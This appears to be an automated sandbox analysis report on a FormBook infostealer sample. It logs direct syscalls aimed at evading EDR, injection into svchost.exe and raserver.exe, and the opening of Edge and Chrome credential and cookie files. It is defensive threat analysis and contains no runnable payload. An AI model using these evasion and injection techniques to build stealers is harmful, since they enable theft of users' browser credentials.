                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03038AA0 mov eax, dword ptr fs:[00000030h]3_2_03038AA0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03038AA0 mov eax, dword ptr fs:[00000030h]3_2_03038AA0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03086AA4 mov eax, dword ptr fs:[00000030h]3_2_03086AA4
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03086ACC mov eax, dword ptr fs:[00000030h]3_2_03086ACC
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03086ACC mov eax, dword ptr fs:[00000030h]3_2_03086ACC
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03086ACC mov eax, dword ptr fs:[00000030h]3_2_03086ACC
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03030AD0 mov eax, dword ptr fs:[00000030h]3_2_03030AD0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03064AD0 mov eax, dword ptr fs:[00000030h]3_2_03064AD0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03064AD0 mov eax, dword ptr fs:[00000030h]3_2_03064AD0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306AAEE mov eax, dword ptr fs:[00000030h]3_2_0306AAEE
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306AAEE mov eax, dword ptr fs:[00000030h]3_2_0306AAEE
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030AE908 mov eax, dword ptr fs:[00000030h]3_2_030AE908
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030AE908 mov eax, dword ptr fs:[00000030h]3_2_030AE908
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030BC912 mov eax, dword ptr fs:[00000030h]3_2_030BC912
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03028918 mov eax, dword ptr fs:[00000030h]3_2_03028918
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03028918 mov eax, dword ptr fs:[00000030h]3_2_03028918
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B892A mov eax, dword ptr fs:[00000030h]3_2_030B892A
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030C892B mov eax, dword ptr fs:[00000030h]3_2_030C892B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B0946 mov eax, dword ptr fs:[00000030h]3_2_030B0946
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03104940 mov eax, dword ptr fs:[00000030h]3_2_03104940
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03056962 mov eax, dword ptr fs:[00000030h]3_2_03056962
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03056962 mov eax, dword ptr fs:[00000030h]3_2_03056962
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03056962 mov eax, dword ptr fs:[00000030h]3_2_03056962
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0307096E mov eax, dword ptr fs:[00000030h]3_2_0307096E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0307096E mov edx, dword ptr fs:[00000030h]3_2_0307096E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0307096E mov eax, dword ptr fs:[00000030h]3_2_0307096E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030D4978 mov eax, dword ptr fs:[00000030h]3_2_030D4978
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030D4978 mov eax, dword ptr fs:[00000030h]3_2_030D4978
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030BC97C mov eax, dword ptr fs:[00000030h]3_2_030BC97C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030429A0 mov eax, dword ptr fs:[00000030h]3_2_030429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030429A0 mov eax, dword ptr fs:[00000030h]3_2_030429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030429A0 mov eax, dword ptr fs:[00000030h]3_2_030429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030429A0 mov eax, dword ptr fs:[00000030h]3_2_030429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030429A0 mov eax, dword ptr fs:[00000030h]3_2_030429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030429A0 mov eax, dword ptr fs:[00000030h]3_2_030429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030429A0 mov eax, dword ptr fs:[00000030h]3_2_030429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030429A0 mov eax, dword ptr fs:[00000030h]3_2_030429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030429A0 mov eax, dword ptr fs:[00000030h]3_2_030429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030429A0 mov eax, dword ptr fs:[00000030h]3_2_030429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030429A0 mov eax, dword ptr fs:[00000030h]3_2_030429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030429A0 mov eax, dword ptr fs:[00000030h]3_2_030429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030429A0 mov eax, dword ptr fs:[00000030h]3_2_030429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030309AD mov eax, dword ptr fs:[00000030h]3_2_030309AD
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030309AD mov eax, dword ptr fs:[00000030h]3_2_030309AD
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B89B3 mov esi, dword ptr fs:[00000030h]3_2_030B89B3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B89B3 mov eax, dword ptr fs:[00000030h]3_2_030B89B3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B89B3 mov eax, dword ptr fs:[00000030h]3_2_030B89B3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030C69C0 mov eax, dword ptr fs:[00000030h]3_2_030C69C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303A9D0 mov eax, dword ptr fs:[00000030h]3_2_0303A9D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303A9D0 mov eax, dword ptr fs:[00000030h]3_2_0303A9D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303A9D0 mov eax, dword ptr fs:[00000030h]3_2_0303A9D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303A9D0 mov eax, dword ptr fs:[00000030h]3_2_0303A9D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303A9D0 mov eax, dword ptr fs:[00000030h]3_2_0303A9D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303A9D0 mov eax, dword ptr fs:[00000030h]3_2_0303A9D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030649D0 mov eax, dword ptr fs:[00000030h]3_2_030649D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030FA9D3 mov eax, dword ptr fs:[00000030h]3_2_030FA9D3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030BE9E0 mov eax, dword ptr fs:[00000030h]3_2_030BE9E0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030629F9 mov eax, dword ptr fs:[00000030h]3_2_030629F9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030629F9 mov eax, dword ptr fs:[00000030h]3_2_030629F9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030BC810 mov eax, dword ptr fs:[00000030h]3_2_030BC810
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03052835 mov eax, dword ptr fs:[00000030h]3_2_03052835
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03052835 mov eax, dword ptr fs:[00000030h]3_2_03052835
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03052835 mov eax, dword ptr fs:[00000030h]3_2_03052835
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03052835 mov ecx, dword ptr fs:[00000030h]3_2_03052835
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03052835 mov eax, dword ptr fs:[00000030h]3_2_03052835
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03052835 mov eax, dword ptr fs:[00000030h]3_2_03052835
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306A830 mov eax, dword ptr fs:[00000030h]3_2_0306A830
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_001881F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_001881F7
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_0015A364 SetUnhandledExceptionFilter,0_2_0015A364
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_0015A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0015A395
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_0003A364 SetUnhandledExceptionFilter,2_2_0003A364
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_0003A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0003A395

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Found direct / indirect Syscall (likely to bypass EDR)
                    Source: C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\RFZmq3QsG0cUeEpW31gsA.exeNtDeviceIoControlFile: Direct from: 0x77012AECJump to behavior
                    Source: C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\RFZmq3QsG0cUeEpW31gsA.exeNtAllocateVirtualMemory: Direct from: 0x77012BECJump to behavior
                    Source: C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\RFZmq3QsG0cUeEpW31gsA.exeNtAllocateVirtualMemory: Direct from: 0x770148ECJump to behavior
                    Source: C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\RFZmq3QsG0cUeEpW31gsA.exeNtSetInformationThread: Direct from: 0x77012B4CJump to behavior
                    Source: C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\RFZmq3QsG0cUeEpW31gsA.exeNtQueryAttributesFile: Direct from: 0x77012E6CJump to behavior
                    Source: C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\RFZmq3QsG0cUeEpW31gsA.exeNtQueryVolumeInformationFile: Direct from: 0x77012F2CJump to behavior
                    Source: C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\RFZmq3QsG0cUeEpW31gsA.exeNtOpenSection: Direct from: 0x77012E0CJump to behavior
                    Source: C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\RFZmq3QsG0cUeEpW31gsA.exeNtQuerySystemInformation: Direct from: 0x770148CCJump to behavior
                    Source: C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\RFZmq3QsG0cUeEpW31gsA.exeNtOpenKeyEx: Direct from: 0x77012B9CJump to behavior
                    Source: C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\RFZmq3QsG0cUeEpW31gsA.exeNtProtectVirtualMemory: Direct from: 0x77012F9CJump to behavior
                    Source: C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\RFZmq3QsG0cUeEpW31gsA.exeNtCreateFile: Direct from: 0x77012FECJump to behavior
                    Source: C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\RFZmq3QsG0cUeEpW31gsA.exeNtOpenFile: Direct from: 0x77012DCCJump to behavior
                    Source: C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\RFZmq3QsG0cUeEpW31gsA.exeNtQueryInformationToken: Direct from: 0x77012CACJump to behavior
                    Source: C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\RFZmq3QsG0cUeEpW31gsA.exeNtTerminateThread: Direct from: 0x77012FCCJump to behavior
                    Source: C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\RFZmq3QsG0cUeEpW31gsA.exeNtProtectVirtualMemory: Direct from: 0x77007B2EJump to behavior
                    Source: C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\RFZmq3QsG0cUeEpW31gsA.exeNtAllocateVirtualMemory: Direct from: 0x77012BFCJump to behavior
                    Source: C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\RFZmq3QsG0cUeEpW31gsA.exeNtReadFile: Direct from: 0x77012ADCJump to behavior
                    Source: C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\RFZmq3QsG0cUeEpW31gsA.exeNtNotifyChangeKey: Direct from: 0x77013C2CJump to behavior
                    Source: C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\RFZmq3QsG0cUeEpW31gsA.exeNtCreateMutant: Direct from: 0x770135CCJump to behavior
                    Source: C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\RFZmq3QsG0cUeEpW31gsA.exeNtSetInformationProcess: Direct from: 0x77012C5CJump to behavior
                    Source: C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\RFZmq3QsG0cUeEpW31gsA.exeNtResumeThread: Direct from: 0x770136ACJump to behavior
                    Source: C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\RFZmq3QsG0cUeEpW31gsA.exeNtSetInformationThread: Direct from: 0x770063F9Jump to behavior
                    Source: C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\RFZmq3QsG0cUeEpW31gsA.exeNtWriteVirtualMemory: Direct from: 0x77012E3CJump to behavior
                    Source: C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\RFZmq3QsG0cUeEpW31gsA.exeNtMapViewOfSection: Direct from: 0x77012D1CJump to behavior
                    Source: C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\RFZmq3QsG0cUeEpW31gsA.exeNtAllocateVirtualMemory: Direct from: 0x77013C9CJump to behavior
                    Source: C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\RFZmq3QsG0cUeEpW31gsA.exeNtWriteVirtualMemory: Direct from: 0x7701490CJump to behavior
                    Source: C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\RFZmq3QsG0cUeEpW31gsA.exeNtClose: Direct from: 0x77012B6C
                    Source: C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\RFZmq3QsG0cUeEpW31gsA.exeNtReadVirtualMemory: Direct from: 0x77012E8CJump to behavior
                    Source: C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\RFZmq3QsG0cUeEpW31gsA.exeNtCreateKey: Direct from: 0x77012C6CJump to behavior
                    Source: C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\RFZmq3QsG0cUeEpW31gsA.exeNtDelayExecution: Direct from: 0x77012DDCJump to behavior
                    Source: C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\RFZmq3QsG0cUeEpW31gsA.exeNtQuerySystemInformation: Direct from: 0x77012DFCJump to behavior
                    Source: C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\RFZmq3QsG0cUeEpW31gsA.exeNtQueryInformationProcess: Direct from: 0x77012C26Jump to behavior
                    Source: C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\RFZmq3QsG0cUeEpW31gsA.exeNtResumeThread: Direct from: 0x77012FBCJump to behavior
                    Source: C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\RFZmq3QsG0cUeEpW31gsA.exeNtCreateUserProcess: Direct from: 0x7701371CJump to behavior
                    Maps a DLL or memory area into another process
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\RFZmq3QsG0cUeEpW31gsA.exe protection: execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exeSection loaded: NULL target: C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\RFZmq3QsG0cUeEpW31gsA.exe protection: read writeJump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exeSection loaded: NULL target: C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\RFZmq3QsG0cUeEpW31gsA.exe protection: execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                    Modifies the context of a thread in another process (thread injection)
                    Source: C:\Windows\SysWOW64\raserver.exeThread register set: target process: 7360Jump to behavior
                    Queues an APC in another process (thread injection)
                    Source: C:\Windows\SysWOW64\raserver.exeThread APC queued: target process: C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\RFZmq3QsG0cUeEpW31gsA.exeJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 24C008Jump to behavior
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2ABC008Jump to behavior
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_00188C93 LogonUserW,0_2_00188C93
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_00133B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00133B4C
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_00134A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00134A35
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_00194EC9 mouse_event,0_2_00194EC9
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\CjbMEPJZ3J.exe"Jump to behavior
                    Source: C:\Program Files (x86)\sypmnaUFIFJpCAPKHlfHuERtKdepteSzkqJBhjVwTSvPgEmYqBPbkqAcKoSPRoofLbEXFa\RFZmq3QsG0cUeEpW31gsA.exeProcess created: C:\Windows\SysWOW64\raserver.exe "C:\Windows\SysWOW64\raserver.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Melba\unnervously.exe "C:\Users\user\AppData\Local\Melba\unnervously.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Melba\unnervously.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_001881F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_001881F7
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_00194C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00194C03
                    Source: CjbMEPJZ3J.exe, unnervously.exe.0.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                    Source: CjbMEPJZ3J.exe, unnervously.exe, RFZmq3QsG0cUeEpW31gsA.exe, 00000004.00000002.3544759142.0000000001701000.00000002.00000001.00040000.00000000.sdmp, RFZmq3QsG0cUeEpW31gsA.exe, 00000004.00000000.1168644083.0000000001700000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                    Source: RFZmq3QsG0cUeEpW31gsA.exe, 00000004.00000002.3544759142.0000000001701000.00000002.00000001.00040000.00000000.sdmp, RFZmq3QsG0cUeEpW31gsA.exe, 00000004.00000000.1168644083.0000000001700000.00000002.00000001.00040000.00000000.sdmp, RFZmq3QsG0cUeEpW31gsA.exe, 00000010.00000002.3544785955.00000000010D1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                    Source: RFZmq3QsG0cUeEpW31gsA.exe, 00000004.00000002.3544759142.0000000001701000.00000002.00000001.00040000.00000000.sdmp, RFZmq3QsG0cUeEpW31gsA.exe, 00000004.00000000.1168644083.0000000001700000.00000002.00000001.00040000.00000000.sdmp, RFZmq3QsG0cUeEpW31gsA.exe, 00000010.00000002.3544785955.00000000010D1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
                    Source: RFZmq3QsG0cUeEpW31gsA.exe, 00000004.00000002.3544759142.0000000001701000.00000002.00000001.00040000.00000000.sdmp, RFZmq3QsG0cUeEpW31gsA.exe, 00000004.00000000.1168644083.0000000001700000.00000002.00000001.00040000.00000000.sdmp, RFZmq3QsG0cUeEpW31gsA.exe, 00000010.00000002.3544785955.00000000010D1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_0015886B cpuid 0_2_0015886B
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_001650D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_001650D7
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_00172230 GetUserNameW,0_2_00172230
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_0016418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_0016418A
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_00134AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00134AFE
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected FormBook
                    Source: Yara matchFile source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.1307445094.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1252330585.0000000002990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.3546898290.0000000004EE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1252898618.0000000004750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.3543179880.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1252099883.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.3544967404.0000000004790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.3545019349.00000000047E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.3545054686.0000000004160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\SysWOW64\raserver.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
